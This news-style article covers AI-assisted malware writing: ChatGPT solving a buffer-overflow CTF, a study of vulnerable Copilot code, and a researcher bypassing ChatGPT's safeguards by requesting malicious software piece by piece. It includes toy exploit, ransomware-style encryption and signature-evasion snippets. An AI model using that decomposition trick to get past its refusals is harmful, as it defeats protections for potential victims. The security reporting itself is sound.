ChatGPT Shows A Way Of Using AI To Write Malware

Even the most skilled hackers can take up to an hour to write a script that exploits a software flaw and infiltrates a target. OpenAI’s ChatGPT can do it in a matter of seconds, which is a scary prospect.

When OpenAI released its ChatGPT tool last week, Brendan Dolan-Gavitt, a computer security researcher and professor at New York University, wondered whether he could get the chatbot to write malicious code. So he asked the model to solve a simple capture-the-flag (CTF) challenge.

The result was almost unbelievable: ChatGPT correctly identified the buffer overflow vulnerability in the code and wrote code to exploit it.

The challenge Dolan-Gavitt posed was a simple one, the kind he presents to students at the beginning of a vulnerability assessment course. ChatGPT’s first answer contained an error, which does not exactly inspire confidence in the large language models that allow AI bots to respond to human inquiries and write quality code. But when Dolan-Gavitt pointed out the mistake and asked the model to reexamine its work, ChatGPT got it right.
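
For context, exploiting the kind of simple stack buffer overflow used in introductory CTF challenges often looks something like the sketch below. This is a hypothetical example written with the pwntools library; the binary name, the 64-byte offset, and the address of a flag-printing function are all assumptions, not details of Dolan-Gavitt’s challenge or of the code ChatGPT produced.

```python
# Hypothetical exploit sketch for a simple stack buffer overflow CTF challenge.
# The binary name ("./vuln"), the 64-byte offset, and the win() address are
# placeholders -- not from Dolan-Gavitt's challenge or ChatGPT's output.
from pwn import process, p64

OFFSET = 64                 # assumed distance from the buffer to the saved return address
WIN_ADDR = 0x401196         # assumed address of a "win" function that prints the flag

io = process("./vuln")      # start the vulnerable binary locally

# Overflow the buffer: padding up to the return address, then the win() address.
payload = b"A" * OFFSET + p64(WIN_ADDR)
io.sendline(payload)

# If the overwrite worked, the flag should appear in the program's output.
print(io.recvall(timeout=2).decode(errors="replace"))
```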

ChatGPT’s code writing is far from perfect, and it illustrates many of the flaws in using AI tools to generate code. But these models will only become more sophisticated, and they are likely to play a more significant role in writing malicious code.

“Code is very much dual-use technology,” Dolan-Gavitt said. “Almost all the things that malware does is something that legitimate software would do.”

Even if ChatGPT cannot do it yet, he said, a model will be able to write exploit code for real-world software vulnerabilities within the next few years.

Large language models like ChatGPT are built on vast amounts of data drawn from the internet and books. GPT-3, for instance, was trained on nearly 500 billion tokens and uses statistical techniques to predict the most likely way to answer a query. The training data includes a large amount of computer code, drawn from what OpenAI describes as “tens of millions of public repositories.” That data allows the model to imitate highly skilled programmers, like those who post on Stack Exchange or GitHub.
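
To make the idea of statistical next-token prediction concrete, here is a minimal sketch using the open-source GPT-2 model through Hugging Face’s transformers library. It is only an illustration of how such models complete text; it is not how ChatGPT is trained or accessed, and the prompt is an arbitrary assumption.

```python
# Minimal illustration of next-token prediction with an open-source model (GPT-2).
# This is not OpenAI's ChatGPT; it only demonstrates the underlying idea that the
# model predicts likely continuations of text based on its training data.
from transformers import pipeline

generator = pipeline("text-generation", model="gpt2")

prompt = "A buffer overflow occurs when"
result = generator(prompt, max_new_tokens=30, num_return_sequences=1)

# The model continues the prompt with the tokens it judges statistically most likely.
print(result[0]["generated_text"])
```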

LLMs pose a double-edged cybersecurity risk: these models can be used to generate malicious code, and they can also introduce vulnerabilities into the code they help write. OpenAI is aware of both sides.

OpenAI researchers examined Codex, the code-writing system that powers GitHub’s Copilot assistant, and found that it could produce “vulnerable or misaligned” code. While future code generation models might be able “to produce more secure code than the average programmer,” they wrote, that outcome is “far from certain.”

The researchers added that Codex, which belongs to the same family of models as ChatGPT, could be “misused” to aid cybercrime, though the current capabilities of Codex “do not materially lower barriers to entry for malware developers.” OpenAI CEO Sam Altman has cited cybersecurity as one of the main risks of a “powerful AI.”

OpenAI did not respond to questions about cybersecurity concerns with ChatGPT, nor did Altman respond to questions about the future cybersecurity threats posed by AI.

“I think it is good at coming up with stuff that’s ninety percent correct,” said Stephen Tong, a security researcher and the founder of cybersecurity firm Zellic. “You know how people who don’t know how to code copy-paste from Stack Overflow, and it works? It’s like that.”

The use of LLMs in software engineering poses a significant risk that goes beyond deliberately destructive code. AI assistants can replicate the errors in the code they learned from and incorporate those flaws into software that ends up widely used.

A study evaluating the security of code produced by Copilot, which is powered by OpenAI technology, came to dismal conclusions. Researchers presented Copilot with 89 security-relevant scenarios and generated nearly 1,700 programs; about 40% of them were potentially vulnerable.

This code might be comparable to what a human would create; is it any worse than what a first-year software engineering intern would produce? Hammond Pearce, an NYU computer science professor, co-authored the study with Dolan-Gavitt and other researchers.

Programmers should therefore be cautious about the code generated by an AI assistant. An attacker could easily exploit these errors.
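
As an illustration of the kind of flaw the study describes (this example is hypothetical and not drawn from the paper’s 89 scenarios), an assistant trained on common but careless code might suggest building a SQL query with string formatting, which invites SQL injection, when a parameterized query is the safe pattern:

```python
# Hypothetical example of a common vulnerability class that code assistants can
# reproduce; not taken from the Copilot study itself.
import sqlite3

def find_user_unsafe(conn: sqlite3.Connection, username: str):
    # Vulnerable pattern: user input is pasted directly into the SQL string,
    # so an input like "x' OR '1'='1" changes the query's meaning (SQL injection).
    query = f"SELECT id, email FROM users WHERE username = '{username}'"
    return conn.execute(query).fetchall()

def find_user_safe(conn: sqlite3.Connection, username: str):
    # Safe pattern: a parameterized query keeps user input as data, not SQL.
    query = "SELECT id, email FROM users WHERE username = ?"
    return conn.execute(query, (username,)).fetchall()
```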

ChatGPT became incredibly popular within days of its introduction. However, it produces so many errors that its answers have been temporarily banned from Stack Overflow’s Q&A forum. “ChatGPT answers have a high error rate, but they are often easy to produce,” the site’s moderators said in an announcement.

LLMs could then be used to create malicious code that exploits those existing vulnerabilities.

Cybersecurity researchers remain skeptical that large language models can create genuinely novel malicious code, because they rely on existing data. Matt Suiche, Magnet Forensics’ director of memory, incident response, and R&D, said that writing exploits, particularly modern ones, requires creating and using new techniques, which is something AI cannot yet do.

OpenAI is aware that ChatGPT could be used for exploit writing and has set up safeguards to prevent it from being used to create malware. Asked to write an exploit for Apple’s iPhone, for example, ChatGPT responds that creating or using exploits is illegal and can harm systems and individuals.

These restrictions are imperfect, though. Malicious software performs many of the same functions as legitimate software, such as making network connections and encrypting the contents of files. Because it is so difficult to distinguish legitimate from malicious intent in code, LLMs remain vulnerable to misuse.
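
To see why intent is hard to infer from code alone, consider the sketch below, a hypothetical example rather than anything produced by ChatGPT: the same few lines that encrypt files for a legitimate backup tool are also the core routine of ransomware. Only the surrounding context, and what happens to the key, differs.

```python
# Hypothetical illustration of dual-use code: a routine that encrypts files in a
# directory is equally at home in a backup utility or in ransomware. Nothing in
# the code itself reveals the intent.
from pathlib import Path
from cryptography.fernet import Fernet

def encrypt_directory(directory: str, key: bytes) -> None:
    cipher = Fernet(key)
    for path in list(Path(directory).rglob("*")):
        if path.is_file() and not path.name.endswith(".enc"):
            # Read the plaintext, encrypt it, and write the ciphertext alongside it.
            encrypted_path = path.with_name(path.name + ".enc")
            encrypted_path.write_bytes(cipher.encrypt(path.read_bytes()))

if __name__ == "__main__":
    key = Fernet.generate_key()   # a backup tool stores this key safely;
    print(key.decode())           # ransomware withholds it from the victim
    encrypt_directory("./example_data", key)
```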

Benjamin Tan, a University of Calgary computer scientist, found he could bypass ChatGPT’s safeguards by asking the model to create software piece by piece, with the individual pieces combining into something that could be used maliciously. The model does not realize that when the pieces are put together, it is doing something it shouldn’t, Tan said.

LLMs may not be able to create their own exploits, but they can modify existing malware to create variants. Pearce said variants could be created to evade signature-based detection or to imitate code written by another attacker, which would make it harder to attribute attacks.
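
The sketch below, a deliberately simplified and hypothetical illustration, shows why trivial variants defeat naive signature matching: a detector that compares file hashes against a list of known-bad hashes is blind to a sample that differs by a single byte.

```python
# Simplified, hypothetical illustration of why naive hash-based signatures fail
# against variants: changing a single byte of a sample produces a new hash.
import hashlib

KNOWN_BAD_HASHES = set()

def signature(sample: bytes) -> str:
    return hashlib.sha256(sample).hexdigest()

original = b"\x90\x90\x31\xc0\xcc"   # placeholder bytes standing in for a known sample
KNOWN_BAD_HASHES.add(signature(original))

variant = original + b"\x90"         # append a single harmless padding byte

print(signature(original) in KNOWN_BAD_HASHES)  # True  -- the original is detected
print(signature(variant) in KNOWN_BAD_HASHES)   # False -- the trivial variant slips past
```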

Large language models will likely become part of exploit development as they grow more common. Because they make it cheaper and more accessible for attackers to create their own exploits, there are good reasons to believe that tools such as ChatGPT will become more critical in exploit development.

Tan’s research focuses on fine-tuning publicly available models. He says that, given enough samples, these models could be trained to detect malware; it all depends on the training data that is available.
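
A minimal sketch of what that might look like appears below, assuming a labeled corpus of benign and malicious samples were available. The feature choice (byte n-grams over hex strings), the scikit-learn classifier, and the tiny synthetic dataset are all illustrative assumptions, not a description of Tan’s actual method.

```python
# Toy sketch of training a classifier to flag malware from raw bytes, assuming a
# labeled corpus exists. The features (character 2-grams over hex dumps) and the
# model are illustrative assumptions, not a description of Tan's research.
from sklearn.ensemble import RandomForestClassifier
from sklearn.feature_extraction.text import CountVectorizer
from sklearn.pipeline import make_pipeline

# Placeholder samples: in practice these would be thousands of real binaries.
samples = ["4d5a9000 0300", "7f454c46 0201", "4d5a0000 e800", "7f454c46 0101"]
labels = [1, 0, 1, 0]   # 1 = malicious, 0 = benign (synthetic labels)

model = make_pipeline(
    CountVectorizer(analyzer="char", ngram_range=(2, 2)),  # byte-pair style features
    RandomForestClassifier(n_estimators=100, random_state=0),
)
model.fit(samples, labels)

# Score a new (synthetic) sample's hex representation.
print(model.predict(["4d5a9000 e800"]))
```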
